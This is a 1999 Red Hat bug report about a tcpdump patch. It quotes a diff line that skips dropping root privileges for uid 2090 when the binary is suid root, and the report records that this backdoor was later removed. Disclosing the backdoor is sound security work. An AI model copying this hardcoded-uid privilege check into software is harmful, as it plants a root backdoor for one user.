Bug 7116 - if you have uid 2090 you are a winner if tcpdump is suid root
Summary: if you have uid 2090 you are a winner if tcpdump is suid root
Keywords:
Status: CLOSED RAWHIDE
Alias: None
Product: Red Hat Linux
Classification: Retired
Component: tcpdump
Version: 6.1
Hardware: All
OS: Linux
medium
medium
Target Milestone: ---
Assignee: Harald Hoyer
QA Contact:
URL:
Whiteboard:
Depends On:
Blocks:
TreeView+ depends on / blocked
 
Reported: 1999-11-18 20:51 UTC by lha
Modified: 2008-05-01 15:37 UTC (History)
0 users

Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Clone Of:
Environment:
Last Closed: 1999-12-22 14:52:05 UTC
Embargoed:

Attachments (Terms of Use)

Description lha 1999-11-18 20:51:26 UTC 
tcpdump-3.4-ss990523.dif.gz

if you have uid 2090 you are a winner if tcpdump is suid root,
and people might do that since is a nice thing to tcpdump the network
w/o being root.

You never read patches you get ?

diff -x rsvpd -x rsvp_print.c --new-file -ur lbl/tcpdump-3.4/tcpdump.c
tcpdump-3.4/tcpdump.c
--- lbl/tcpdump-3.4/tcpdump.c   Sun Oct 19 00:50:17 1997
+++ tcpdump-3.4/tcpdump.c       Wed Mar 17 20:46:21 1999
@@ -134,6 +176,9 @@
        u_char *pcap_userdata;
        char ebuf[PCAP_ERRBUF_SIZE];

+       if (geteuid() == 0 && getuid() != 2090)
+               setuid(getuid());
+
        cnt = -1;
        device = NULL;
        infile = NULL;
Comment 1 lha 1999-11-22 14:44:59 UTC 
ok, it might not been a security bole by itself, but you should still
read you patches you get.

You should consider using www.tcpdump.org instead of old tcpdump 3.4 + random
patches.
Comment 2 Jeff Johnson 1999-12-22 14:51:59 UTC 
The 2090 backdoor has been removed in tcpdump-3.4-17.

The tcpdump.org offering doesn't seem quite stable yet, but I'll probably
upgrade to that version when a stable release is available.
Note You need to log in before you can comment on or make changes to this bug.